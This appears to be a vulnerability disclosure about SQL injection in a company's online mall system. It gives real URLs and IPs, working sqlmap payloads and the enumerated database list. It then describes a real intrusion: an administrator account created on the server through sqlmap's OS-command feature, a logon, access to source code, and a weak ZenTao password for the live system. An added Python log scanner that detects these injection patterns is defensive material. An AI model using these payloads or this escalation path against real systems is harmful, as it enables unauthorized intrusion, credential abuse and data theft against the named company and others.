2015-12-17: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed to the public.
2016-01-28: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
SQL injection
First, the official site's server was found to expose a web service on port 81, which is an online shopping-mall system:
http://www.inke.com.cn:81/Clients/Shops.aspx?Sid=5CCD89751E9B4B968A86ECEFEC244380&state=9
Another server, B, runs the same mall system and has the same injection:
http://115.29.220.93:89/Clients/Shops.aspx?sid=5CCD89751E9B4B968A86ECEFEC244380&state=9
Injection details reported by the scanner.
OK, let's feed it to sqlmap and take a look:
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Parameter: state (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9';WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(90)+CHAR(69)+CHAR(109)+CHAR(68)+CHAR(66)+CHAR(117)+CHAR(74)+CHAR(106)+CHAR(121)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: state (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9';WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: sid=5CCD89751E9B4B968A86ECEFEC244380&state=9' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(90)+CHAR(69)+CHAR(109)+CHAR(68)+CHAR(66)+CHAR(117)+CHAR(74)+CHAR(106)+CHAR(121)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[*] AD_ORDER
[*] Inju_O2O
[*] Inke
[*] inkeserver30
[*] InkeTest
[*] mana
[*] master
[*] model
[*] msdb
[*] newInke
[*] oldInke
[*] ReportServer
[*] ReportServerTempDB
[*] SFOAV5
[*] sqbliugp
[*] tempdb
[*] Ykxt2015-2
[*] Ykxt2015-SC
[*] Ykxt2015Dev2
[*] Ykxt2015Dev_new
[*] Ykxt2015ff
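The sqlmap output above shows the two injection techniques that worked against the `state` parameter: a time-based stacked query (`;WAITFOR DELAY`) and a NULL-padded `UNION ALL SELECT` with `CHAR()+CHAR()` string markers. Both leave distinctive traces in the IIS W3C request log, and the `state` value itself stops looking like the small integer the page expects. The following is an added detection example written for this page; it is not part of the original report and not code from the affected mall system. It assumes the default IIS W3C field layout (date, time, s-ip, cs-method, cs-uri-stem, cs-uri-query, s-port, cs-username, c-ip, cs(User-Agent), sc-status), and the log lines, client IPs and the hypothetical `EXPECTED_PARAMS` schema (sid as a 32-hex-digit id, state as an integer) are constructed for the example.

```python
"""Flag SQL-injection probes against Shops.aspx in IIS W3C logs (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not taken from the report). Fields follow the
# default layout: date time s-ip cs-method cs-uri-stem cs-uri-query s-port
# cs-username c-ip cs(User-Agent) sc-status, with '-' for an empty field.
# IIS writes the query URL-encoded, so spaces appear as '+' and '+' as '%2B'.
SAMPLE_LOG = """\
2015-12-17 10:01:02 10.0.0.5 GET /Clients/Shops.aspx sid=5CCD89751E9B4B968A86ECEFEC244380&state=9 81 - 203.0.113.7 Mozilla/5.0 200
2015-12-17 10:01:09 10.0.0.5 GET /Clients/Shops.aspx sid=5CCD89751E9B4B968A86ECEFEC244380&state=9';WAITFOR+DELAY+'0:0:5'-- 81 - 203.0.113.7 sqlmap/1.0 200
2015-12-17 10:01:10 10.0.0.5 GET /Clients/Shops.aspx sid=5CCD89751E9B4B968A86ECEFEC244380&state=9'+UNION+ALL+SELECT+NULL,NULL,NULL,CHAR(113)%2BCHAR(112)-- 81 - 203.0.113.7 sqlmap/1.0 500
2015-12-17 10:02:00 10.0.0.5 GET /Clients/Shops.aspx sid=5CCD89751E9B4B968A86ECEFEC244380&state=12 81 - 198.51.100.4 Mozilla/5.0 200
"""

# Hypothetical typed schema for the endpoint (assumption: sid is a 32-hex-digit
# id and state is a small integer, as the report's own URLs suggest).
EXPECTED_PARAMS = {
    "sid": re.compile(r"^[0-9A-Fa-f]{32}$"),
    "state": re.compile(r"^\d{1,6}$"),
}

# Signatures for the techniques sqlmap reported: a time-based stacked query,
# a UNION query, and MSSQL CHAR()+CHAR() concatenation used as string markers.
INDICATORS = {
    "stacked_waitfor": re.compile(r";\s*WAITFOR\s+DELAY\b", re.IGNORECASE),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE),
    "char_concat": re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.IGNORECASE),
}

FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
          "s_port", "username", "c_ip", "user_agent", "status"]


def parse_iis_line(line):
    """Split one W3C log line into a dict; None for comment, blank or malformed lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def split_query(raw_query):
    """Decode cs-uri-query into {name: value}.

    The split on '&' is done by hand rather than with parse_qs so that a ';'
    inside a value (the stacked-query separator) is kept as part of the value.
    """
    if raw_query == "-":
        return {}
    params = {}
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def check_request(record):
    """Return finding labels for one parsed record, e.g. 'union_select:state'."""
    findings = []
    for name, value in split_query(record["uri_query"]).items():
        rule = EXPECTED_PARAMS.get(name)
        # A value that is not of the expected type is the cheapest, earliest signal.
        if rule is not None and not rule.match(value):
            findings.append(f"type_violation:{name}")
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                findings.append(f"{label}:{name}")
    return findings


def scan_log(text):
    """Return [(line_number, client_ip, findings)] for every suspicious request."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        record = parse_iis_line(line)
        if record is None:
            continue
        findings = check_request(record)
        if findings:
            hits.append((number, record["c_ip"], findings))
    return hits


if __name__ == "__main__":
    for number, client_ip, findings in scan_log(SAMPLE_LOG):
        print(f"line {number} from {client_ip}: {', '.join(findings)}")
```

The type check on `state` catches both probes before any signature does, which is the same property that a parameterized query with a typed integer parameter in the page's code-behind would enforce at the database layer; the signature rules are there to give the alert a name and to catch probes against parameters the schema does not cover.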
The server turned out to be Windows 2008; using sqlmap's --os-cmd I created a server administrator account test/P@ssW0rd! and then logged on to the server.
The server holds the source code and the database information.
The server also has port 84 open, running a ZenTao system with the weak password admin/123456 .... which contains all kinds of information on the company's development projects.
Fix: patch the injection, change the ZenTao weak password, and delete the test user from the server.
Unable to contact the vendor, or the vendor actively refused.